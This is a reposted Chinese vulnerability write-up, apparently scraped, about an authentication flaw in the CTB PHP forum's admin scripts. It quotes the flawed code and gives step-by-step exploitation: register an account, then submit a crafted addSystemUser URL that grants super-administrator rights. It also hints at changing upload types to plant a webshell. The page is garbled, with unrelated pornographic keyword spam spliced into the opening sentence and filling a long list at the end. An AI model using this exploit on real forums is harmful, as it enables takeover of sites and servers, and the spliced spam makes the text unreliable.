>>>Dedicated This Scrap To CaoJing<<<

涉及版本:
^^^^^^^
目前所有版本(現在1.3Alpha為最高版本)

描述:
^^^^^^
CTB是一款由實易數碼<11cn.org>;開發和維護的源代碼開放的PHP論 " /> 午夜AV亚洲一码二中文字幕青青,国产精品青青草原app大全,免费国产麻豆传

天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

漂亮但不安全的CTB


>>>Dedicated This Scrap To CaoJing<<< 

涉及版本: 
^^^^^^^ 
目前所有版本(現在1.3Alpha為最高版本) 

描述: 
^^^^^^ 
CTB是一款由實易數碼<11cn.org>;開發和維護的源代碼開放的php論壇。由于其后臺管理文件驗證存在缺陷,可能導致非法用戶直接添加論壇超級管理員,進而威脅論壇或服務器安全。 

具體: 
^^^^ 
CTB書寫非常規范,代碼井然有序,賞心悅目,的確是優美的程序;特別是其功能模塊,著實讓小弟學習了一把。但安全方面卻令人堪憂: 

試看如下代碼: 

/admin/main.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 //獲取get變量 
   if( is_array($_GET) ) { 
      foreach($_GET as $k=>$v) { 
           if( is_array( $_GET[$k]) ) { 
               foreach($_GET[$k] as $k2=>$v2) { 
                   $return[$k][$k2] = $v2; 
               } 
           } else { 
               $return[$k] = $v; 
           } 
       } 

... 
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod']; 
   if (!file_exists($mod.".php" { 
       $mod = "mainright"; 
   } 
   require_once ($mod.".php"; 
   //----------------------------------------------------------------------------- 

   //初始化類變量 
   $ctb = new Module; 
   $ctb->set = $set; 
   $ctb->tplPath = "./templates"; 
   $ctb->input = $return; 
   $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION; 
   $ctb->execute(); 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

這里沒有任何驗證,我們看看添加管理員的文件: 

/admin/systemuser.php 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
class Module extends CommonClass 
//系統管理模塊子類 

   function execute() { 
       switch($this->input['action']) { 
... 
case 'addSystemUser': 
               $this->addSystemUser(); 
               break; 
... 
    }       
   } 

function addSystemUser() 

   //輸入數據簡單格式化 
   $this->inputCheck("main.php?mod=systemuser&action=showSystemUser"; 
   //執行添加操作 
        $this->file = "../".$this->set[dataPath]."/users/list.php"; 
   $systemLine = $this->select(4, $this->input['systemUserName']); 
.... 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

依然沒有驗證,一路順利啊! 

利用方法: 
^^^^^^^ 
先注冊一個用戶: 

登陸ID:  cat 
用戶名 :   dog 
密碼:      ilikecat 
重復密碼:  ilikecat 
信箱:      [email protected] 

接著提交如下URL: 

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你現在已經是超級管理員了,不相信?提交如下URL后臺登陸: 

http://www.psych.com/ctb/admin/main.php?mod=login 

管理名稱:  cat 
管理密碼:  ilikecat 

咦...還真成功了! 

你現在是不是想更改后臺上傳文件類型,然后upload webshell?哼,被我猜到了吧... 

后記:另外發現CTB代碼注釋有些扎眼的錯別字,大煞風景,希望可以一起修正。

php技術漂亮但不安全的CTB,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 老牛天天晚上夜噜噜噜 | 暖暖 视频 免费 高清 在线观看 | 中文字幕视频在线观看 | 亚洲日韩有码无线免费 | 日本六九视频 | 亚洲国产在线精品国自产拍五月 | 极品少妇高潮啪啪AV无码 | 狠狠婷婷综合久久久久久 | 真实处破女全过程完免费观看 | 欧美熟妇VIVOE精品 | 天天影视网网色色欲 | 欧美最猛黑人AAAAA片 | 欧美牲交A欧美牲交VDO | 高h 纯肉文 | 国产成人精品视频频 | 视频一区亚洲视频无码 | 精品无码久久久久久久久 | 99re8在线视频精品 | 99视频免费看| 国产精品久久久久久人妻香蕉 | 亚洲国产日韩欧美高清片a 亚洲国产日韩a精品乱码 | 一个人日本的视频免费完整版 | 99re久久热免费视频 | 久久青草免费线观最新 | 国产精品久久久久久亚洲影视 | 久久天天躁狠狠躁夜夜躁 | 99久久精品免费国产一区二区三区 | 大岛优香久久中文字幕 | 久久伊人精品青青草原2021 | 大香伊人久久精品一区二区 | a在线免费观看视频 | 99久久蜜臀亚洲AV无码精品 | 高清大胆欧美videossexo | 一区两区三不卡 | 姑娘日本大全免费观看版中文翻译 | 99热视频这里只有久久精品 | 天天躁夜夜踩很很踩2022 | 久久草这里全是精品香蕉频线观 | 成人高清网站 | 欧美 亚洲 日韩 中文2019 | JIZZ学生13|